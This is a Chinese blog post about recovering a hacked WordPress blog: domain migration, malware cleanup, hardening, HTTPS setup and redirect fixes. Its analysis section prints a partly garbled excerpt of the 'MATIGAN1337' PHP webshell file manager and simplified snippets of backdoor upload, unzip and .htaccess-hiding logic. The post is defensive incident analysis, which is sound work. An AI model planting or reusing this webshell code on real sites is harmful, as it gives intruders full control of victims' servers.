博客网站安全加固

网站被攻击,前后被封禁了两个域名。。。

于是,被迫进行了域名迁移,安全防控的一些事情

终于在过年前解决了这个心头大患

救命,域名被封

大学的时候,用WordPress快速搭建了一个个人博客,工作后就没怎么管了

后来有回访问,发现网站挂了,排查是域名被腾讯云封禁了

最开始我抱有侥幸心理,直接申请解封,第一次马上就通过了,OK了,我就没管了

没过几天又被封了,说是有违规内容。。。我也没发乱七八糟的东西啊,我寻思是不会是腾讯上了什么大模型的检测算法,检测错了,又申请解封了,又给我过了,后来还是被封了。。。这时候意识到问题不好,可能被🐶攻击了。我这垃圾个人网站,黑客会看的上?黑客眼里没有大小,安全做的不好就是软柿子。。。

我就想着再解封,去WordPress后台好好检查一下,但是这个时候已经不是解封了,是申诉。。。不给解封了,网站一直没有整改。网站和后台都访问不了了

找域名的人帮忙看看不管,让找主机的人,找主机的人说应该是被攻击了,让我自己检查文件,不提供网站安全的服务,白瞎了我每年给他交几百块钱

这时候给我整吐血了,早知道不拖延,早点治理的

当时萌生退意,一个时间成本,一个是可能还要花钱买新域名和新主机,没啥用还吃钱

再一个PHP和wordPress 都不熟悉,网络安全的东西也不大懂,还是有可能被封怎么办?

毕竟在公司就是做全链路的其中某一环。

当时跑了这么多年的网站又不舍得直接扔掉,虽然没啥东西

于是乎,决定自己人肉去主机上看下有没有什么奇怪的目录和文件

发现刚进来就是一堆命名古怪,大小统一的目录,我从来没创建过这些目录

而且这些目录还有个特点就是大小一样

搜了下,这些文件大概率就是黑客批量生成的

这些目录和文件大概率是:

  • 隐藏 Webshell 后门
  • 存储违规内容 / 垃圾文件  (网站被封的核心原因)
  • 作为攻击工具的 “中转站”
  • 伪装成正常目录迷惑

OK全部删掉,这下子应该没问题了吧

换个域名,搬家

域名都换了,黑客应该搞不到我了吧

于是乎,血亏买了个新域名

网站走新域名

但是DNS配置后

网站通过新域名可以访问了,但是图片和资源都加载不出来

1.修改 siteurl 和 home 配置:

把旧域名改到新域名

2.修改DB中域名:

UPDATE wp_blogposts SET post_content = REPLACE(post_content, '老域名', '新域名');
UPDATE wp_blogpostmeta SET meta_value = REPLACE(meta_value, '老域名', '新域名');

3.到主机文件,修改php代码,强制绑定新域名 wp-config.php

// 强制绑定新域名,彻底禁止跳转旧域名
define('WP_SITEURL', '新域名');
define('WP_HOME', '新域名');
define('FORCE_SSL_ADMIN', false); // 如果没配HTTPS,保持false

配置文件说明

代码区块核心作用关键说明
MySQL 配置段(DB_NAME/DB_USER 等)连接你的 WordPress 数据库这部分是数据库的账号密码,你无需修改,能正常连接数据库即可
安全密钥段(AUTH_KEY/SECURE_AUTH_KEY 等)生成登录 Cookie、验证用户身份的安全密钥系统自动生成,无需修改,保证站点安全
$table_prefix = ‘wp_lastTry’数据库表前缀对应你之前看到的 wp_lastTryoptions 等表,和你之前改的 wp_blog 是同一类作用,无需修改
WP_DEBUG = false调试模式开关关闭状态(生产环境推荐),无需修改
你新增的强制绑定代码锁死新域名,禁止跳转核心解决跳转问题的代码,位置和内容都正确
最后两行(ABSPATH/wp-settings.php)定义 WordPress 根目录,加载核心文件系统默认代码,无需修改

让主机客服清理下缓存

您好,我的虚拟主机产品 ID 是 hostingxxx(新云主机 H2,香港节点)。
问题描述:我更换了站点域名(从 xxx 到 xxx),已完成面板绑定、数据库域名替换、固定链接刷新,但新域名访问主页时,文字能正常显示,图片和 CSS/JS 资源却加载失败(浏览器控制台显示 404 或加载被拦截)。
已排查:图片路径已替换为新域名,.htaccess 是默认规则,文件夹权限已设为 755。
需求:麻烦帮忙清除服务器端的静态资源缓存,并检查 Nginx 配置是否有拦截静态资源的规则,谢谢!

好了上面都搞完之后,网站终于恢复正常访问啦

不是,新域名又被封了

好景不长,没过几天,新域名又被封了,不然再来两回,新域名也要凉凉了

看来之前的问题属于治标不治本

趁着周末空闲点,决定把这个手捧雷解决掉!!!

忍不了了,焊死后门

我确认不了的文件、目录、代码,我就扔给AI分析

并给我输出最佳治理的方案,我就一步步照着执行就完事了

首先到 wordPress后台,有专门的健康管理模块

发现我的php、wordpress、还是插件、主题版本都很低

于是乎大刀阔斧,第一步全都升级到新版本

都升级后,又出现了一个吐血的事情,网站挂了,应该是升级后有的东西不兼容。。。

我赶紧又把版本回退了,然后把所有的插件都禁用掉,然后再重新升级版本

然后把一些网站乱七八糟的插件和主题内容全都删掉,网站恶意的评论也都删掉

检查网站里所有的恶意文件或者代码后门

之前迁移域名之后,被封,说明清理的不彻底

了解到有一个安全插件,比较猛,试了下挺不错的,但是也会有漏掉或者误删除的风险

然后借助人工 + AI协助 + 插件协助,把网站从里到外搞了个干净

为了保险起见,我又把网站的主题也换成了官方最新的,老的全部删掉

最后把一些文件目录的权限设置的更严格一点

把网站密码设置了各种字符组合10来位,第一次设置了这么复杂的密码。。也限制了登录频控

还会有登录用户的检查

最后再升级下HTTPS

为什么要升级?

  • 安全加密:用户和网站之间的传输数据会被加密,避免被黑客窃取或篡改,彻底解决浏览器 “不安全” 警告。
  • SEO 加分:Google 等搜索引擎优先收录 HTTPS 站点,排名更有优势。
  • 信任提升:地址栏的小锁图标会让读者更放心访问,减少跳出率。
  • 功能兼容:现代浏览器(如 Chrome)对 HTTP 站点会限制部分功能(如摄像头、通知权限),升级后才能正常使用。 

Let’s Encrypt 是全球主流浏览器都认可的免费证书颁发机构

Let’s Encrypt 是被 ICANN(互联网名称与数字地址分配机构)认可的权威 CA,Chrome、Safari、Edge、Firefox 等所有主流浏览器都会信任其颁发的证书

简单对比下证书类型吧,我最终用的是 Let’s Encrypt

选项类型验证方式浏览器信任度操作复杂度成本适用场景核心优缺点
使用服务器的证书主机商预先验证信任(显示主机商域名)零操作免费临时测试、无独立域名站点免费但安全风险高、品牌感弱
创建你自己的签名证书无验证(自己生成)完全不信任(标红警告)简单免费本地测试、内部服务器免费但无法用于正式网站
一键创建 Let’s Encrypt 证书主机商自动验证域名所有权100% 信任(绿色锁 + 你的域名)一键操作永久免费个人博客、中小正式网站免费、安全、自动续期,个人站最优解
粘贴证书 / 密钥 + CA 根证书自行向 CA 机构完成验证100% 信任(OV/EV 专属标识)付费(几百 – 几千元 / 年)企业官网、金融 / 电商站点信任度高但成本高、操作复杂

 

主机商会自动验证你对域名的所有权,验证通过后由 Let’s Encrypt 颁发可信证书,并检测域名是否绑定到当前服务器

Let’s Encrypt 的标准申请流程原本需要手动完成 “生成证书请求(CSR)、验证域名所有权、申请证书、部署证书、配置续期” 等技术步骤,而主机商的 “一键功能” 是把这些步骤全部自动化

验证完成后,Let’s Encrypt 自动颁发证书,主机商会把证书文件(公钥、私钥)下载到服务器,并自动配置到你的 Web 服务(如 Apache、Nginx)中, 使网站支持HTTPS

证书过期前,主机商也会自动续期,把之前的流程重新走一遍

然后配置301重定义

上面2步搞忘后再访问网站就会失败了

下一步通过wp-config.php修改站点的URL从http到https,保存后,日,还是不行

提示重定向的次数过多

原因是网站配置文件有个配置文件  .htaccess 有问题 

代码末尾有一行这个

RedirectMatch 301 ^/$ https://xxx 

这行代码的每个部分,对应一个强制指令,没有任何 “筛选条件”

  • RedirectMatch 301:表示 “永久强制重定向”(一旦触发,浏览器会一直记住这个规则);
  • ^/$:是代码的 “匹配规则”,专门只匹配网站首页
  • 最后一个 就是重定向的目标地址

总的来说就是不管访问的首页是什么协议(HTTP/HTTPS),只要是首页,就强制跳转到目标地址

但是我不是本身就想跳转到HTTPS的目标地址嘛?

原因是我在上面 已经通过wp-config.php修改站点的URL从http到https

用户访问首页的那一刻,循环就开始了,全程就 3 步,无限重复:

  • 你在浏览器输入 https://xxx 想打开首页;
  • 服务器接收到请求,触发那行错误代码:“检测到是首页,强制跳转到https://xxx”;
  • 浏览器接到指令,再次请求 https://xxx → 又触发错误代码 → 再次跳转……

可以理解 .htaccess文件代码和wp-config.php 文件代码有些冲突,或者简单理解 .htaccess 本身就有问题

可以把 .htaccess 代码优化下,只有不是HTTPS时,才做重定向跳转

RewriteCond %{HTTPS} !=on  # 只有一个判断条件:仅当访问协议不是HTTPS时,才执行下面的跳转
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301,NE]

修复后,网站访问正常

除此之外,网站内部的数据库存储的原信息或者一些资源啥的,可能很多也是http,统一也换成https

找到一个插件可以做这个事情

这里替换完成后,还没完事

访问一些页面到控制台上,发现提示…

Mixed Content: The page at ‘<URL>’ was loaded over HTTPS, but requested an insecure element ‘<URL>’. This request was automatically upgraded to HTTPS, For more information see <URL>

发现有些链接还没替换干净。。 按照报错case by case的再做一些更细粒度的替换就行了

前后一共处理了几千个域名的替换,访问也没有加载异常也没有报错了,舒服了

到这里HTTPS升级也完成啦

升级完成后,地址栏会显示锁

最后,在用 SSL Labs Server Test 给网站跑下分, A-

这4个打分标准都是啥意思呢?

  • Certificate(证书):满分 100说明你的 SSL 证书(Let’s Encrypt)配置完全合规:信任度、域名匹配度、有效期等均符合浏览器及安全标准的要求。
  • Protocol Support(协议支持):接近满分支持的 TLS 协议(如 TLS 1.2)是当前主流的安全协议,但缺少最新的 TLS 1.3(后续提示会说明)。
  • Key Exchange(密钥交换):高分密钥交换的算法(如 RSA)安全强度达标,能有效防止密钥被破解,保障连接的安全性。
  • Cipher Strength(加密强度):高分数据传输时使用的加密算法强度足够,可避免传输过程中数据被窃取或篡改。

感觉到这里基本齐活了,如果再被攻击再被封,尼玛,这个网站就不要了
 

黑客都是怎么攻击的呢

黑客通常都会上传什么文件呢

文件格式作用典型文件名
.php最核心的后门文件(可执行代码)shell.phpadmin.phpconfig.phpup.phptest.php,或伪装成正常文件(如 wp-includes/functions-xxx.phpwp-content/uploads/2024/01/image.php
.php5/.php7/.phtml绕过服务器对 .php 的检测,本质还是 PHP 后门backdoor.phtmlshell.php5
伪装图片格式(.jpg.php/.png.php利用服务器解析漏洞,表面是图片,实际是 PHP 脚本avatar.jpg.phpbanner.png.php(注意文件名有双重后缀)
.txt/.log存储窃取的数据(如账号密码、数据库信息)data.txtlog.txtbackup.log
压缩包(.zip/.rar批量上传后门文件后解压files.zipbackup.rar(解压后包含多个 PHP 后门)

 

黑客不会凭空上传文件,本质是利用漏洞入口

  • 插件 / 主题漏洞
  • WordPress 核心程序漏洞
  • 登录凭证泄露(暴力破解 / 弱密码)
  • 服务器 / 主机配置漏洞
  • 数据库漏洞

刚才说了这么文件代码,我肯定搞不过来,借助安全插件和AI

AI分析文件:

AI分析代码:

我们再来分析下黑客后门代码,这些后门代码都是怎么搞进去的呢?

利用php、wordpress、主题、插件漏洞入侵,甚至有些主题插件本身在安装的时候已经被植入了后门都有可能

那么黑客可以利用这些后门怎么攻击我们

检查分析出来黑客主要搞了2类后门:

二者是互相配合完成攻击的

维度v9.phpjancokukersz.php
功能定位远程控制入口文件操作工具
技术实现代码混淆 + 远程执行可视化文件管理界面
直接危害动态操控网站批量上传违规内容
封禁关联度间接辅助直接触发

这是在我主机某一个代码文件里,隐藏的后门代码

这是一个完整的远程控制工具,黑客仅需密码'a'即可登录,执行任意代码、上传违规文件、修改站点内容。

chr()函数拼接字符串、通过session存储恶意代码、最终用eval()动态执行,完全是为了躲避安全检测。

网站拷贝出来的另一份后门代码:

MATIGAN1337
— YANG — HILANG — AKAN — TUMBUH — LAGI — ATAU PUNAH —

  SOFT : PHP :
$l) { if($l=='' && $m==0) { echo '/'; } if($l == '') { continue; } echo ''.$l.'/'; } ?>


未选择任何文件  UPLOAD  
$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });' ]; $f = $o_[0].'OK!'.$o_[1]; $g = $o_[0].'ER!'.$o_[1]; if(isset($_FILES["n"])) { $z = $_FILES["n"]["name"]; $r = count($z); for( $i=0 ; $i < $r ; $i++ ) { if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) { echo $f; } else { echo $g; } } } ?>
'; $b_ = ' '; $c_ = ' '; $d_ = '

 '; if(isset($_GET["s"])) { echo $a_.uhex($_GET["s"]).$b_.' 
'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'


 '.$c_; } elseif(isset($_GET["y"])) { echo $a_.'REQUEST'.$b_.'
   
 '.$d_.'
';

									if(isset($_POST["2"])) {
										echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
									}

								echo '
 '.$c_; } elseif(isset($_GET["e"])) { echo $a_.uhex($_GET["e"]).$b_.' 
'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'


BASE64 : 
NO
 '.$d_.' '.$c_.' '; if(isset($_POST["e"])) { if($_POST["b64"] == "1") { $ex = $GNJ[7]($_POST["e"]); } else { $ex = $_POST["e"]; } $fp = $GNJ[17](uhex($_GET["e"]), 'w'); if($GNJ[18]($fp, $ex)) { OK(); } else { ER(); } $GNJ[19]($fp); } } elseif(isset($_GET["x"])) { rec(uhex($_GET["x"])); if($GNJ[26](uhex($_GET["x"]))) { ER(); } else { OK(); } } elseif(isset($_GET["t"])) { echo $a_.uhex($_GET["t"]).$b_.' 
'.$GNJ[20](
 '.$d_.' '.$c_; if( !empty($_POST["t"]) ) { $p = $GNJ[33]($_POST["t"]); if($p) { if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) { ER(); } else { OK(); } } else { ER(); } } } elseif(isset($_GET["k"])) { echo $a_.uhex($_GET["k"]).$b_.' 
'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET[
 '.$d_.' '.$c_; if(!empty($_POST["b"])) { $x = $_POST["b"]; $t = 0; for($i=strlen($x)-1;$i>=0;--$i) $t += (int)$x[$i]*pow(8, (strlen($x)-$i-1)); if(!$GNJ[12](uhex($_GET["k"]), $t)) { ER(); } else { OK(); } } } elseif(isset($_GET["l"])) { echo $a_.'+DIR'.$b_.' 
 '.$d_.' '.$c_; if(isset($_POST["l"])) { if(!$GNJ[11]($_POST["l"])) { ER(); } else { OK(); } } } elseif(isset($_GET["q"])) { if($GNJ[10](__FILE__)) { $GNJ[38]($GNJ[9]); header("Location: ".basename($_SERVER['PHP_SELF']).""); exit(); } else { echo $g; } } elseif(isset($_GET["n"])) { echo $a_.'+FILE'.$b_.' 
 '.$d_.' '.$c_; if(isset($_POST["n"])) { if(!$GNJ[25]($_POST["n"])) { ER(); } else { OK(); } } } elseif(isset($_GET["r"])) { echo $a_.uhex($_GET["r"]).$b_.' 
'.uhex($_GET[
 '.$d_.' '.$c_; if(isset($_POST["r"])) { if($GNJ[26]($_POST["r"])) { ER(); } else { if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) { OK(); } else { ER(); } } } } elseif(isset($_GET["z"])) { $zip = new ZipArchive; $res = $zip->open(uhex($_GET["z"])); if($res === TRUE) { $zip->extractTo(uhex($_GET["d"])); $zip->close(); OK(); } else { ER(); } } else { echo ' '; $h = ""; $j = ""; $w = $GNJ[13]($d); if($GNJ[28]($w) || $GNJ[29]($w)) { foreach($w as $c){ $e = $GNJ[14]("\\", "/", $d); if(!$GNJ[30]($c, ".zip")) { $zi = ''; } else { $zi = 'U'; } if($GNJ[31]("$d/$c")) { $o = ""; } elseif(!$GNJ[32]("$d/$c")) { $o = " h"; } else { $o = " w"; } $s = $GNJ[34]("$d/$c") / 1024; $s = round($s, 3); if($s>=1024) { $s = round($s/1024, 2) . " MB"; } else { $s = $s . " KB"; } if(($c != ".") && ($c != "..")){ ($GNJ[8]("$d/$c")) ? $h .= ' ' : $j .= ' '; } } } echo $h; echo $j; echo '
[ NAME ]	[ SIZE ]	[ PERM ]	[ DATE ]	[ ACT ]
+FILE +DIR
'.$c.'	dir	'.x("$d/$c").'	'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'	R D
  '.$c.'	'.$s.'	'.x("$d/$c").'	'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'	R E G '.$zi.' D
REQUEST EXIT				
'; } ?>
©Matigan1337

是黑客专门制作的PHP 大马后门(黑客圈常用的站点控制工具),文件名、乱码注释、加密函数都是黑客为了隐藏自身、躲避检测设计的,唯一作用就是让黑客无需登录你博客后台,就能完全控制你的站点

  • 任意文件上传:黑客能通过这个后门,直接往你站点(比如wp-content/uploads/)上传违规图片 / 视频 / 文件、其他恶意脚本、涉敏内容,平台检测到这些内容就会封域名;
  • 任意文件编辑 / 删除:黑客能修改你站点的正常文件(比如主题、插件代码),插入隐藏的违规链接、涉敏文字、非法广告,甚至删除你的博客内容;
  • 任意代码执行:黑客能运行任意 PHP 代码,操控你的站点做任何事(比如篡改文章、发送垃圾邮件、利用你的站点攻击其他网站);
  • 全站文件 / 目录管理:黑客能查看你站点所有文件、创建 / 删除目录,把违规内容藏在你不易发现的文件夹里,反复触发封禁;
  • 压缩 / 解压文件:黑客能批量上传违规内容压缩包,通过后门直接解压,快速在你站点部署大量涉敏文件,效率极高;
  • 自我隐藏 / 销毁:代码里包含自我保护逻辑,黑客可随时让这个后门隐藏起来,甚至删除自身躲避排查,导致你之前清理不彻底、域名反复被封。

我们再来分析下这些代码都是怎么做的?

核心其实都是围绕下面三个目标

隐藏自身不被发现 -> 获取网站全权限操作 -> 批量上传 / 持久化存储违规内容

最大的前提,黑客拥有了执行权,不论是通过什么途径,植入了代码

无论哪种操作,前提是黑客已通过主题 / 插件 / PHP 漏洞,让你的服务器执行了他的恶意 PHP 代码(比如上面的v9.php后访问该文件,服务器就会解析执行其中的代码),PHP 作为网站 “发动机”,拥有和网站相同的文件操作、目录管理权限 —— 这也是为什么代码能直接创建目录、上传文件

然后就是隐藏自身,可以看到上面代码里有意思的都是char拼接成的

相当与是把恶意代码拆成 ASCII 码

eval()是 PHP 的代码执行函数—— 它能把 “字符串当作 PHP 代码直接执行“

有了操作权,就可以开始生成目录了

// 生成随机目录名:数字/字母组合,比如mt_rand(10,99)生成11/22,md5(rand())生成afe/bhr
$rand_dir = mt_rand(10,99); // 生成2位随机数字,对应目录11/22
// 或生成随机字母目录:substr(md5(rand()),0,3) → 截取md5随机字符串前3位,如afe/bhr
// $rand_dir = substr(md5(rand()), 0, 3);

// 关键函数:mkdir() → PHP创建目录的原生函数
mkdir($rand_dir, 0777, true); 
// 0777:设置目录权限为全员可读写执行,确保后续能上传文件
// true:支持创建多级目录,避免报错

然后再上传违规内容压缩包

// 接收浏览器上传的文件(黑客选择违规压缩包后提交)
$upload_file = $_FILES['file']; // file是上传表单的名称
$target_dir = '11/'; // 上传到刚才创建的随机目录
// 目标文件路径:随机目录+原文件名
$target_file = $target_dir . basename($upload_file['name']);

// 关键函数:move_uploaded_file() → PHP处理文件上传的核心函数
if (move_uploaded_file($upload_file['tmp_name'], $target_file)) {
    echo '上传成功'; // 黑客端显示上传成功
} else {
    echo '上传失败';
}

解压缩

$zip_file = '11/weigui.zip'; // 刚才上传的违规压缩包
$target_dir = '11/'; // 解压到同一随机目录

// 关键函数:ZipArchive类 → PHP原生解压zip的类
$zip = new ZipArchive();
if ($zip->open($zip_file) === TRUE) {
    $zip->extractTo($target_dir); // 解压所有文件到目标目录
    $zip->close();
    unlink($zip_file); // 可选:删除压缩包,隐藏上传痕迹
}
  • 调用 PHP 原生ZipArchive类,直接解压违规压缩包到随机目录;
  • 解压后会生成大量违规文件(比如色情页面、赌博链接、垃圾外链 HTML),这些文件会被平台的爬虫 / 检测系统发现,直接触发域名封禁

黑客还可以遍历网站所有文件 / 目录,实现 “全权限管理”

$dir = './'; // 遍历网站根目录
// 关键函数:scandir() → 遍历目录下所有文件/子目录
$files = scandir($dir);

// 循环遍历,在浏览器里展示成列表(黑客看到的可视化界面)
foreach ($files as $file) {
    if ($file == '.' || $file == '..') continue;
    echo $file . '<br>'; // 展示文件/目录名,点击可进入/操作
}

还能屏蔽安全插件的扫描

// 关键函数:file_put_contents() → PHP写入文件的函数
$htaccess_content = "Deny from all\nOptions -Indexes";
file_put_contents('11/.htaccess', $htaccess_content);
  • Deny from all:禁止所有外部 IP 访问该目录,安全插件的扫描爬虫也无法进入,无法检测到里面的违规内容;
  • Options -Indexes:禁止目录索引,站长即使误点进入该目录,也只会显示 “403 禁止访问”,误以为是无用目录,不会删除;
  • 这也是之前没发现这些目录里有违规内容的重要原因 ——无法直接访问,扫描也进不去

黑客完整的攻击流程如下:

  1. 黑客通过主题 / 插件漏洞,上传v9.php并访问,输入密码a通过验证,获得远程执行代码的权限
  2. 黑客通过v9.phpeval()函数,执行一行代码:file_put_contents('jancokukersz.php', '【文件管理后门的完整代码】');直接在网站根目录创建核心后门,无需再次上传;
  3. 黑客访问jancokukersz.php,通过其可视化界面,执行批量创建随机目录的代码(mkdir()+ 循环),生成11/a/afe等目录;
  4. 黑客通过该后门的文件上传功能move_uploaded_file()),将违规内容压缩包上传到随机目录;
  5. 黑客通过该后门的解压功能ZipArchive),解压压缩包生成大量违规文件,触发平台检测,域名被封
  6. 若只是清理了违规文件 / 目录,黑客可通过v9.php重新调用jancokukersz.php重复 3-5 步,实现 “反复上传、反复封禁”。

当然随着PHP和WordPress的升级,很多权限和安全都做的更好了

快速了解 PHP和WordPress

PHP VS Java

对比维度JavaPHP
设计初衷跨平台、企业级全场景后端开发专为 Web 动态网站开发而生
核心优势天生高安全、高并发、强规范,支持分布式 / 微服务,适配海量数据处理轻量简洁、新手友好、Web 开发效率拉满,生态贴合中小站点
学习 / 使用门槛高 —— 需掌握面向对象、框架(Spring Boot/SSM)、JVM 等,环境配置繁琐低 —— 语法松散,无需编译,一键搭建 LAMP 环境,配套 CMS(WordPress / 织梦)开箱即用
资源占用高 —— 需高配服务器,内存、CPU 消耗大,适合大规模部署低 —— 低配服务器即可流畅运行,资源占用少,贴合个人 / 中小站点成本需求
生态沉淀企业级生态完善 —— 金融、电商、政务等大型项目框架、解决方案齐全Web 建站生态完善 —— 各类 CMS、插件、主题、教程遍地都是,新手随手能找到解决方案
安全特性天生强安全 —— 自带沙箱机制、强类型校验,框架自带防攻击功能后天完善 ——7.4 + 版本安全大幅提升,核心靠正规配置 + 生态管控,避免人为漏洞

WordPress架构图

  • PHP:属于服务器端脚本语言,是网站的 “后端执行发动机”,无可视化界面,负责解析执行动态代码、处理文件 / 数据库操作、实现数据交互(比如创建目录、上传文件、连接 MySQL 数据库存文章),所有动态网站的核心操作,最终都要靠 PHP 完成;
  • WordPress:是完全基于 PHP 语言开发的开源 CMS(内容管理系统),相当于工程师用 PHP “发动机”,搭配 MySQL “油箱”(数据库,存文章 / 评论 / 设置)、HTML/CSS/JS “车身外观”,打造的一款 “成品建站汽车”—— 它把复杂的 PHP 代码、数据库操作封装成可视化后台(比如点击 “发布文章”“安装主题”),让零基础站长不用写代码就能建站。

没有 PHP,WordPress 就是一堆无意义的静态文本文件,无法运行;PHP 的配置、版本、权限,直接决定 WordPress 的运行效率、安全上限;WordPress 的主题 / 插件漏洞,本质都是 PHP 代码的漏洞。

PHP 与 WordPress 是 **“底层引擎” 和 “上层成品”的强绑定关系,WordPress 的所有运行和操作都依赖 PHP,二者的安全也是一荣俱荣、一损俱损 **

现在的主题功能太强大了

现在找的新的主题,比好多年前上大学那会牛逼多了

功能强大样式也很好

可以采用拖拽和配置的方式自定义布局自己的网站页面

可以不用写css代码,没有啥设计感美感的后端也能快速搞一个好看的自己想要的页面,学习和操作成本都非常低

防暴力破解

关小黑屋


有脏东西还在捅


先到这里,这下子应该安全了吧!

发表评论

您的邮箱地址不会被公开。 必填项已用 * 标注

滚动至顶部